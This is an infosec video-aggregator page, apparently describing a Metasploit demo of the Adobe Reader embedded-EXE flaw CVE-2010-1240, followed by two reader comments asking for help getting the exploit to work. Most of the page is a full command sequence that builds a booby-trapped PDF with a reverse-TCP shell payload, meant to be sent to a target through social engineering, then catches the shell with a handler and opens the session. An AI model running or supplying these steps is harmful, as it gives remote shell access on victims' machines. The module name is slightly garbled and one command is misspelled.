Description: Timeline :
Vulnerability discovered & disclosed by Didier Stevens the 2010-03-29
Exploit-DB PoC provided by Didier Stevens the 2010-03-31
PoC provided by:
jduck
Colin Ames
Reference(s) :
CVE-2010-1240
EDB-ID-11987
Affected versions :
Adobe Reader 9.3.2 and earlier versions for Windows, Macintosh, and UNIX
Adobe Acrobat 9.3.2 and earlier versions for Windows and Macintosh
Tested on Windows XP SP3 with Adobe Reader 9.3.0
Description :
This module embeds a Metasploit payload into an existing PDF file. The resulting PDF can be sent to a target as part of a social engineering attack.
Metasploit demo :
use exploit/windows/fileformat/adobe_pdf_embÂedded_exe
set OUTPUTPATH /home/eromang
set INFILENAME metasploit.pdf
set TARGET 0
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.178.21
exploit
use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.178.21
expoit -j
sessions -i 1
dir
Tags: metasploit , pdf , adobe , reader , windows , microsoft , hack ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
Hi, whenever i try to carry out this exploit it tells me the INFILENAME pdf doesn't exist...is there a specific location i have to save the pdf in because i cant seem to get around it :/
sorry to bother you again lol but i finally got the pdf to parse but now its saying
Exploit exception undefined method [] for nil:Nil Class
Any ideas? it would be greatly appreciated